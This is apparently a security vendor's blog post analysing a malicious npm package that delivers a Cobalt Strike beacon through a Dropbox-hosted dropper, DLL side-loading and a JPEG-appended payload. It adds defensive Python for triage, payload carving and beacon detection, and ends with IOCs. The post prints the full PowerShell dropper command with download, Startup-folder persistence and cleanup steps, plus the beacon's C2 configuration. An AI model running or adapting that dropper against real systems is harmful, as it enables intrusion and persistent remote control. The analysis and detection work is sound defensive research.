In our previous publication, we detailed our internal artifact-scanning service that continuously monitors packages from multiple sources to detect malicious packages and supply chain attacks.
While this automated scanning capability has proven invaluable for threat detection, the sheer volume of alerts generated by our artifact scanner presents a significant challenge. Security analysts often find themselves overwhelmed by the task of triaging and analyzing hundreds of potential threats daily, making the process both tedious and time-consuming.
To address this bottleneck, we developed RuneAI – an internal service that helps us make sense of large THOR result streams by enriching weak signals with context and highlighting anomalies that deserve analyst attention. We are currently integrating these additional assessments into our products and expect to surface them in THOR Cloud first, followed by the ASGARD Analysis Cockpit.
In our artifact-scanning pipeline, we scan packages from places like npm, PyPI, and VS Code Marketplace with THOR Thunderstorm. We then forward selected low-scoring hits and suspicious artifacts to RuneAI for an additional assessment. That’s also what happened here: a low-scoring THOR rule hit was escalated by RuneAI as genuinely suspicious, which is what kicked off the deeper malware analysis in this post.
Today, we’re showcasing RuneAI’s capabilities through this real-world example from our artifact-scanning pipeline.
RuneAI Assessment
The following section contains the automated assessment generated by RuneAI. It is based on the event stream and matches produced by our THOR Thunderstorm scans of the package, and is intended to prioritize suspicious elements for review. The output is shown as produced, with only minimal formatting applied for readability.
Package: @etoroloro/my_node_js_module:1.0.1
Risk Assessment: 95%
Executive Summary
The script contains critical security flaws including hardcoded Dropbox credentials, malicious payload delivery via Dropbox, persistence via Windows Startup folder, and unvalidated remote command execution. It functions as a remote access trojan (RAT) with C2 capabilities.
Detected patterns
| Pattern | Category | Severity | Reason |
|---|---|---|---|
| Hardcoded Credentials | Credential Theft | Critical | Hardcoded Dropbox client ID, secret, and refresh token in source code (exposed in public repository). |
| Malicious Payload Delivery | Malware Dropper | Critical | Downloads and executes malicious ZIP files from Dropbox via PowerShell commands (iwr/Expand-Archive). |
| Persistence Mechanism | Persistence | Critical | Copies malicious batch file to Windows Startup folder ($env:APPDATA\...\Startup). |
| Unvalidated Remote Command Execution | Remote Code Execution | Critical | Executes arbitrary commands from Dropbox file without validation (via exec(command)). |
| C2 Communication | Command & Control | Critical | Uses Dropbox as C2 channel to receive commands from readFilePath and send outputs to writeFilePath. |
Most Suspicious Code Snippet
```powershell
'cls; iwr "https://www.dropbox[.]com/scl/fi/f0yd861z6rvugtxuerjn1/protected.zip?rlkey=fx4gvjmf16q5owainu5pfld47&st=cn2oooqb&dl=1" -OutFile "C:\Users\Public\protected.zip"; iwr "https://www.dropbox[.]com/scl/fi/wwbvmzsukfamp9ozo0xxj/data.zip?rlkey=w2j3q5jsmeqfyoyneo21g84qa&st=p443mlzs&dl=1" -o "C:\Users\Public\data.zip"; Expand-Archive -Path "C:\Users\Public\protected.zip" -DestinationPath "C:\Users\Public\"; Expand-Archive -Path "C:\Users\Public\data.zip" -DestinationPath "C:\Users\Public\"; Copy-Item C:\Users\Public\data.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\data.bat" -Force; Remove-Item protected.zip,data.zip -Recurse -Force'
```
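The behaviours in the table above (remote download, archive expansion, Startup-folder persistence, cleanup) are easy to express as a small triage heuristic that an analyst can run over command strings pulled out of package scripts. The following Python is an added example written for this post; it is not RuneAI or THOR code, and its pattern weights and verdict thresholds are assumptions of the example. The two sample commands are constructed: the first mirrors the dropper shown above with the Dropbox file identifiers replaced by placeholders, the second is a harmless build step.

```python
import re
from typing import Dict, List

# Constructed sample 1: the dropper command from the assessment, with the Dropbox
# file identifiers replaced by EXAMPLE placeholders (URLs kept defanged).
DROPPER_COMMAND = (
    r'cls; iwr "https://www.dropbox[.]com/scl/fi/EXAMPLE1/protected.zip?dl=1" '
    r'-OutFile "C:\Users\Public\protected.zip"; '
    r'iwr "https://www.dropbox[.]com/scl/fi/EXAMPLE2/data.zip?dl=1" -o "C:\Users\Public\data.zip"; '
    r'Expand-Archive -Path "C:\Users\Public\protected.zip" -DestinationPath "C:\Users\Public\"; '
    r'Expand-Archive -Path "C:\Users\Public\data.zip" -DestinationPath "C:\Users\Public\"; '
    r'Copy-Item C:\Users\Public\data.bat '
    r'"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\data.bat" -Force; '
    r'Remove-Item protected.zip,data.zip -Recurse -Force'
)

# Constructed sample 2: a benign build step that also expands an archive and cleans up.
BENIGN_COMMAND = r'Expand-Archive -Path build.zip -DestinationPath .\out; Remove-Item build.zip'

# Heuristic patterns taken from the behaviours listed in the assessment table.
# name -> (regex, weight). Weights are an assumption of this example.
PATTERNS = {
    "remote_download": (re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|curl|wget|downloadfile|downloadstring|start-bitstransfer)\b",
        re.I), 30),
    "archive_expand": (re.compile(r"\bexpand-archive\b", re.I), 10),
    # Startup folder under the user's Start Menu: autostart persistence.
    "startup_persistence": (re.compile(r"start menu\\programs\\startup", re.I), 40),
    # C:\Users\Public is world-writable and a common staging location.
    "public_staging": (re.compile(r"c:\\users\\public\\", re.I), 10),
    "artifact_cleanup": (re.compile(r"\bremove-item\b", re.I), 10),
}

URL_RX = re.compile(r"""https?://[^\s"']+""", re.I)


def extract_urls(command: str) -> List[str]:
    """Pull every URL out of a command string for indicator hand-off."""
    return URL_RX.findall(command)


def triage_command(command: str) -> Dict[str, object]:
    """Score a command string against the dropper patterns and return a verdict."""
    matched = [name for name, (rx, _) in PATTERNS.items() if rx.search(command)]
    score = min(100, sum(PATTERNS[name][1] for name in matched))
    if "remote_download" in matched and "startup_persistence" in matched:
        verdict = "critical"  # download plus autostart persistence: dropper behaviour
    elif score >= 50:
        verdict = "high"
    elif score >= 30:
        verdict = "medium"
    else:
        verdict = "low"
    return {"matched": matched, "score": score, "verdict": verdict,
            "urls": extract_urls(command)}


if __name__ == "__main__":
    for cmd in (DROPPER_COMMAND, BENIGN_COMMAND):
        print(triage_command(cmd))
```

The combination rule matters more than the raw score: `Expand-Archive` and `Remove-Item` on their own are everyday build hygiene, while a remote download that ends in a copy into the Startup folder is the shape of a dropper regardless of what else appears in the command.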
Human-Led Analysis
After RuneAI escalated the package as suspicious, our researchers proceeded with a manual investigation. The following section summarizes what we validated through malware analysis and reverse engineering, including payload staging, execution flow, and post-compromise behavior. This is the point where automated assessment ends and human analysis begins.
The malicious package @etoroloro/my_node_js_module:1.0.1 demonstrates a multi-stage attack chain that combines legitimate software with hidden malicious payloads.
The Dropbox links were still active at the time of analysis. The script installs legitimate SQLite software as cover, while the malicious payload is delivered via a DLL that is loaded using the DLL side-loading technique. The sqlite3.dll loads DLLSideload.dll, which forwards one function call and simply returns a number. The presence of sideload.jpg appears to be a remnant left behind by the threat actor, as it is never actually read or executed by the malware.
The main sample sqlite3.dll opens a license.xml file that is actually a valid JPEG file containing hidden data.
The encrypted payload is not steganographically hidden, but rather concatenated to the end of the existing image. The loader searches for the pattern FF D8 FF E0 from the end to the beginning of the file – this is the magic identifier of a JPEG file, making the file appear as concatenated images.
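Because the payload is simply appended after a second JPEG header, an analyst can carve it out with the same backwards search the loader performs, without running the sample. The Python below is an added example for this post, not the loader's code or a Nextron tool; it assumes, as the description above implies, that the appended blob is preceded by its own FF D8 FF E0 marker. The cover image and payload bytes are constructed inline so the example runs offline.

```python
import hashlib
from typing import Optional, Tuple

# SOI (FF D8) followed by the APP0 marker (FF E0): the start of a JFIF file.
JPEG_SOI_APP0 = b"\xff\xd8\xff\xe0"

# Constructed sample: a minimal JFIF-like cover image ending in EOI (FF D9),
# followed by a second header and a stand-in for the encrypted payload.
SAMPLE_COVER = JPEG_SOI_APP0 + b"\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"A" * 64 + b"\xff\xd9"
SAMPLE_PAYLOAD = b"ENCRYPTED-BLOB-" + bytes(range(32))
SAMPLE_FILE = SAMPLE_COVER + JPEG_SOI_APP0 + SAMPLE_PAYLOAD


def carve_appended_payload(data: bytes) -> Optional[bytes]:
    """Return the bytes after the LAST FF D8 FF E0 marker, mirroring the loader's
    end-to-start search. Returns None when the only marker is the genuine header,
    i.e. the file is a plain JPEG with nothing appended."""
    if not data.startswith(JPEG_SOI_APP0):
        raise ValueError("not a JFIF image: missing FF D8 FF E0 at offset 0")
    last = data.rfind(JPEG_SOI_APP0)
    if last == 0:
        return None
    return data[last + len(JPEG_SOI_APP0):]


def split_cover_and_payload(data: bytes) -> Tuple[bytes, Optional[bytes]]:
    """Split a carrier file into the cover image and the appended payload."""
    payload = carve_appended_payload(data)
    if payload is None:
        return data, None
    cover_end = data.rfind(JPEG_SOI_APP0)
    return data[:cover_end], payload


def payload_sha256(data: bytes) -> Optional[str]:
    """SHA-256 of the carved payload, for IOC hand-off, or None if nothing is appended."""
    payload = carve_appended_payload(data)
    return hashlib.sha256(payload).hexdigest() if payload is not None else None


if __name__ == "__main__":
    cover, payload = split_cover_and_payload(SAMPLE_FILE)
    print(f"cover: {len(cover)} bytes, payload: {len(payload)} bytes, "
          f"sha256={payload_sha256(SAMPLE_FILE)}")
```

Searching from the end rather than the beginning is deliberate: it picks the same split point the loader uses, so the carved blob is exactly what gets decrypted on the victim. The carved bytes are still AES-encrypted at this point; the hash is useful for matching the carrier across samples before any decryption work.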
The payload is then decrypted and executed. The decryption uses a custom AES ECB implementation with a custom key derivation process.
The final stage is a Cobalt Strike beacon DLL called beacon.dll, providing the attacker with full remote access capabilities. This sample is already well detected by our existing signatures. The configuration has been extracted:
```json
{
  "beacontype": [
    "HTTPS"
  ],
  "sleeptime": 60000,
  "jitter": 0,
  "maxgetsize": 1048576,
  "spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",
  "license_id": 987654321,
  "cfg_caution": false,
  "kill_date": null,
  "server": {
    "hostname": "34.203.197.60",
    "port": 443,
    "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCAiouXWp2o7OrNP9flXa8Jv5Qvp3yvIaP1q5y4S1uv8QdarYUnuI2CDEB3SI38wxtM8VJSF+hsd9d8nK1pJRfLIs3jK7G3Y/FaTcoO/AaO0MqMGuh6v0EarJVtGX9iF7/Kmb8Bvd4nPiKJ4kZQHYmIS9gNAoS8NOraaXjfS05CdQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
  },
  "host_header": "",
  "useragent_header": null,
  "http-get": {
    "uri": "/match",
    "verb": "GET",
    "client": {
      "headers": null,
      "metadata": null
    },
    "server": {
      "output": [
        "print"
      ]
    }
  },
  "http-post": {
    "uri": "/submit.php",
    "verb": "POST",
    "client": {
      "headers": null,
      "id": null,
      "output": null
    }
  },
  "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
  "crypto_scheme": 0,
  "proxy": {
    "type": null,
    "username": null,
    "password": null,
    "behavior": "Use IE settings"
  },
  "http_post_chunk": 0,
  "uses_cookies": true,
  "post-ex": {
    "spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
    "spawnto_x64": "%windir%\\sysnative\\rundll32.exe"
  },
  "process-inject": {
    "allocator": "VirtualAllocEx",
    "execute": [
      "CreateThread",
      "SetThreadContext",
      "CreateRemoteThread",
      "RtlCreateUserThread"
    ],
    "min_alloc": 0,
    "startrwx": true,
    "stub": "rlr8/ugCZnTcjztPLaRsfw==",
    "transform-x86": null,
    "transform-x64": null,
    "userwx": true
  },
  "dns-beacon": {
    "dns_idle": null,
    "dns_sleep": null,
    "maxdns": null,
    "beacon": null,
    "get_A": null,
    "get_AAAA": null,
    "get_TXT": null,
    "put_metadata": null,
    "put_output": null
  },
  "pipename": null,
  "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
  "stage": {
    "cleanup": false
  },
  "ssh": {
    "hostname": null,
    "port": null,
    "username": null,
    "password": null,
    "privatekey": null
  }
}
```
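An extracted beacon configuration is immediately useful to the network side of the response: the server, port, HTTP URIs and sleep/jitter settings translate directly into proxy-log matching and a beaconing-interval check. The Python below is an added example for this post, not a Nextron tool or part of any config extractor; it reproduces only the config fields it needs (values as shown above), and the proxy log lines and the log format (timestamp, client, verb, target, status) are constructed for the example. The sleep-window arithmetic assumes Cobalt Strike's jitter semantics, where the sleep is shortened by up to the configured percentage.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional

# Subset of the extracted beacon configuration shown above (only the fields used here).
BEACON_CONFIG = {
    "beacontype": ["HTTPS"],
    "sleeptime": 60000,  # milliseconds
    "jitter": 0,         # percent
    "server": {"hostname": "34.203.197.60", "port": 443},
    "http-get": {"uri": "/match", "verb": "GET"},
    "http-post": {"uri": "/submit.php", "verb": "POST"},
}

# Constructed proxy log lines: "<timestamp> <client> <verb> <target> <status>".
# Client 10.0.0.5 connects to the C2 once a minute; 10.0.0.7 hits a benign host
# whose path happens to be /match. The final GET would only be visible with TLS inspection.
PROXY_LOG = [
    "2025-01-10T09:00:00Z 10.0.0.5 CONNECT 34.203.197.60:443 200",
    "2025-01-10T09:01:00Z 10.0.0.5 CONNECT 34.203.197.60:443 200",
    "2025-01-10T09:02:00Z 10.0.0.5 CONNECT 34.203.197.60:443 200",
    "2025-01-10T09:03:00Z 10.0.0.5 CONNECT 34.203.197.60:443 200",
    "2025-01-10T09:03:12Z 10.0.0.7 GET https://updates.example.test/match 200",
    "2025-01-10T09:03:30Z 10.0.0.5 GET https://34.203.197.60/match 200",
]


def network_indicators(cfg: Dict) -> Dict[str, object]:
    """Derive the network indicators a proxy or IDS team can act on."""
    host = cfg["server"]["hostname"]
    return {
        "host": host,
        "socket": f"{host}:{cfg['server']['port']}",
        "uris": [cfg["http-get"]["uri"], cfg["http-post"]["uri"]],
        "scheme": cfg["beacontype"][0].lower(),
    }


def match_proxy_line(line: str, ind: Dict[str, object]) -> Optional[str]:
    """Return why a log line matches the beacon indicators, or None."""
    if ind["socket"] in line:
        return "c2_socket"
    if ind["host"] in line:
        for uri in ind["uris"]:
            # URI must end at a query, fragment, whitespace or end of line (no /matches).
            if re.search(re.escape(uri) + r"(?=[?#\s]|$)", line):
                return f"c2_uri:{uri}"
        return "c2_host"
    return None


def scan_log(lines: List[str], cfg: Dict) -> List[Dict[str, object]]:
    """Run the indicators over the log and keep client and timestamp of every hit."""
    ind = network_indicators(cfg)
    hits = []
    for line in lines:
        reason = match_proxy_line(line, ind)
        if reason is None:
            continue
        ts_str, client = line.split()[:2]
        hits.append({"client": client, "reason": reason,
                     "ts": datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ"), "line": line})
    return hits


def sleep_window_seconds(cfg: Dict, tolerance: float = 0.10):
    """Expected gap between check-ins: sleeptime reduced by up to jitter percent,
    widened by a tolerance for network and logging delay."""
    sleep = cfg["sleeptime"] / 1000.0
    low = sleep * (1 - cfg["jitter"] / 100.0)
    return low * (1 - tolerance), sleep * (1 + tolerance)


def looks_like_beaconing(timestamps: List[datetime], cfg: Dict, min_hits: int = 3) -> bool:
    """True when at least min_hits consecutive gaps fall inside the sleep window."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    low, high = sleep_window_seconds(cfg)
    return sum(low <= g <= high for g in gaps) >= min_hits


if __name__ == "__main__":
    hits = scan_log(PROXY_LOG, BEACON_CONFIG)
    for h in hits:
        print(h["reason"], h["line"])
    c5 = [h["ts"] for h in hits if h["client"] == "10.0.0.5"]
    print("10.0.0.5 beaconing:", looks_like_beaconing(c5, BEACON_CONFIG))
```

The interval check is what makes the config worth more than a plain IP block: with `sleeptime` 60000 and `jitter` 0 the beacon checks in every 60 seconds, so a client showing a run of 60-second gaps to that host is behaving like the implant rather than like a user, even in logs where only the CONNECT is visible.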
The C2 is hosted on an Amazon EC2 server:
Conclusions
Scanners and human analysts operate in very different domains. A scanner like THOR excels at low-ambiguity, high-volume work: applying many rules to many artifacts quickly and consistently. Human analysts excel at high-ambiguity, low-volume work: examining a small number of items in depth, recognizing subtle irregularities, and forming hypotheses from incomplete evidence.
AI is most useful in the space between these two extremes. It neither replaces deterministic scanning nor human judgment. Instead, it can process a moderate volume of imperfect, context-heavy signals and provide additional perspective – highlighting anomalies, connecting weak indicators, and helping prioritize what deserves closer review.
This case is a practical example of that role. A low-scoring THOR hit on the package was not, by itself, a strong verdict. RuneAI enriched the signal with contextual analysis and escalated it as suspicious, which initiated the deeper manual investigation that uncovered the full execution chain.
The diagram below illustrates this positioning:
We apply this approach in our artifact-scanning pipeline to reduce triage workload and to improve visibility into suspicious packages that would otherwise be lost in volume. We plan to make these additional assessments available in our products early next year, first in THOR Cloud and later in the ASGARD Analysis Cockpit.
IOCs
| File | SHA-256 |
|---|---|
| my_node_js_module-1.0.1.tgz | e0a0b3bf0eafc0560b1754c67b0e74e6ad0eeea32f573758f5ba8d7838e5d219 |
| beacon.dll | 6d79bbfadf675deed60b259ae272058c809bfdd53476c3673f9cca797c6fd10b |
| data.bat | d61864987b15020173d7a6ac84cfe0787a2b841fbbb9b98eb26b8c7c9acff5b1 |
| sqlite3.dll | f08c5b748c91dd45fd73c5e85920f656e361d94b869e2147410b2b528c6ae78f |
Network Indicators:
- C2 Server: 34.203.197.60:443
- Boot script: https://www.dropbox[.]com/scl/fi/f0yd861z6rvugtxuerjn1/protected.zip?rlkey=fx4gvjmf16q5owainu5pfld47&st=cn2oooqb&dl=1
- Weaponized sqlite: https://www.dropbox[.]com/scl/fi/wwbvmzsukfamp9ozo0xxj/data.zip?rlkey=w2j3q5jsmeqfyoyneo21g84qa&st=p443mlzs&dl=1
Florian Roth
Marius Benthin
Marc Hirtz